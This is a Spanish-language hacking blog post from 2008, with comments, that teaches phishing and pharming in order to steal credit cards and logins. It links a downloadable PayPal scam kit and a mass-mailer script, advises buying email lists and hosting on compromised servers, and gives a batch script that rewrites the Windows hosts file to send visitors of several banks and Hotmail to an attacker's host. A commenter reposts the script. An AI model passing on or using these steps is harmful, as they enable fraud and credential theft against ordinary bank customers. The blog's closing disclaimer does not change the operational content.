Phising y Pharming

Categorías: Asaltando Windows, Asaltando los sistemas, General | Enviado por: ansatsu (3 artículos) |

Bien pues se escribio un tutorial asi que ya masomenos saben que es.
ahora les voy a explicar como hacerlo para digamos obtener tarjetas de credito, logins, que se yo…

Material:
Scam
Hacked Host
Mail list
Mailer Inbox

Primero hacemos el scam de alguna web .. aqui se los dejo es de paypal
http://rapidshare.com/files/88997799/Scam_PayPal_2008.zip.html

Lo descomprimimos, lo submos a algun hacked host o algun host que tengamos y cuando lo tenemos montado lo probamos y nos dedicamos a buscar cuentas de correo para mandarles el scam, pueden buscar con algun extractor de mails correos , pero como
siempre estan quemados y es posible que algunos no funcionen, lo mas conveniente es decirle a algun wey que se dedique a esto a que te haga el paro y te venda algun mail list para paypal (podria ser de cualquier cosa, banamex, hi5, etc ) si no buquen
por la red hay bastantes, yo les recomiendo el elite extractor, o el tarantula..

Bien ya que tenemos un mail list, conseguimos algun mailer inbox, aqui les dejo la descarga de uno
http://rapidshare.com/files/76390702/mailerpriv8.php

Lo subimos a algun hacked host, no recomiendo host gratuito porque no los envia, ya teniendolo buscamos la letter del scam
(que es lo que se escribe para engañar a la victima)
y si tenemos una letter para pharming nos dedicamos a crear uno :P

Antes de seguir, el pharming es un metedo que consiste en manipular las dns que usa la victima haciendole creer que entra a una web pero en realidad esta en otra (por ejemplo en el scam)

Ejemplo en batch

@echo off
echo ipdetuhost www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.bbva.com >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.esmas.com >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.hotmail.com >> %windir%\system32\drivers\etc\hosts
exit

Como veran de esta manera cuando la victima ejecute este archivo y entre a banamex, bbva, bancomer desde el explorador sera redirigido a ipdetuhost y de esta manera el usuario no se va a dar cuenta que realmente esta en una web fake :)

Solo es teoria en general pero poco a poco AHhahAH

–StATiK–



Últimas entradas:


Comentarios


Entrada escrita en el día Sábado, Marzo 8th, 2008 a las 11:42 pm en las categorías Asaltando Windows, Asaltando los sistemas, General. Puedes encontrar las respuestas a este tema desde el RSS 2.0 feed. Puedes dejar una respuesta o hacer un trackback a tu página web.

4 Comentarios


  1. moyo el Marzo 12, 2008 6:02 pm

    interesante… el problema es como se ejecutaria el batch

    @echo off
    echo ipdetuhost http://www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
    echo ipdetuhost http://www.bbva.com >> %windir%\system32\drivers\etc\hosts
    echo ipdetuhost http://www.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
    echo ipdetuhost http://www.esmas.com >> %windir%\system32\drivers\etc\hosts
    echo ipdetuhost http://www.hotmail.com >> %windir%\system32\drivers\etc\hosts
    exit

  2. VinCenT_VeGa el Marzo 13, 2008 10:57 pm

    Buena data, aunque verdaderamente el phishing no es algo de lo que mas me interese, pero buena.

    Saludos!

  3. 461806 el Abril 8, 2008 3:47 pm

    Oe man si pueddieras explicarme mejor por que estoy perdido

  4. t4k3r0n el Junio 24, 2008 6:31 pm

    que paso static :P no publikes esas cosas ajajajaja :P conectate al irc loko a freenode con los demas :) andsux Sarckz etc open-eslack :) o a mierdachat hack

    alrayo

Nombre (obligatorio)

Email (obligatorio)

Página web

XHTML: Puedes usar los tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Comparte tus pensamientos

  • Importante!

    Los autores de este blog pretenden informar sobre seguridad, vulnerabilidades, técnicas hack, hablar sobre lo último en hacking...

    Profile Las herramientas, trucos, comandos, artículos... explicados en este blog NUNCA deberán ser usados de forma maligna para delinquir o dañar a terceros. No nos hacemos responsables de la mala interpretación ni del mal uso de cualquier contenido del blog.

    Todo lo que se habla en este blog está en internet (o proviene de alguno de los autores) y se puede consultar de forma libre. Si obtienes información de este blog para tu espacio, página web, blog... no olvides ponernos como fuente :).

  • Acerca de

    Profile

    El Blog del Hacker es una web llevada por usuarios de ForoHack.com perteneciente a la web ElHacker.com

    Si quieres colaborar con nosotros lo puedes hacer de forma abierta en nuestros foros y siendo un usuario frecuente podrás ser Autor de este blog.

    El objetivo principal de este blog es dar a conocer desde nuestro propio punto de vista el hacking en la red para Windows o Linux, conocer como funcionan las cosas, hacer más segura la red encontrando vulnerabilidades,... nunca para hacer el mal, estafar, ni nada parecido. Siempre de buen rollo =) Cuanto más se hable de forma abierta sobre estos temas más usuarios y empresas los conocerán y menos nos afectarán (será más segura la red)

    Últimos Comentarios

    Entradas más populares

  • Feeds e Información

  • Registrarse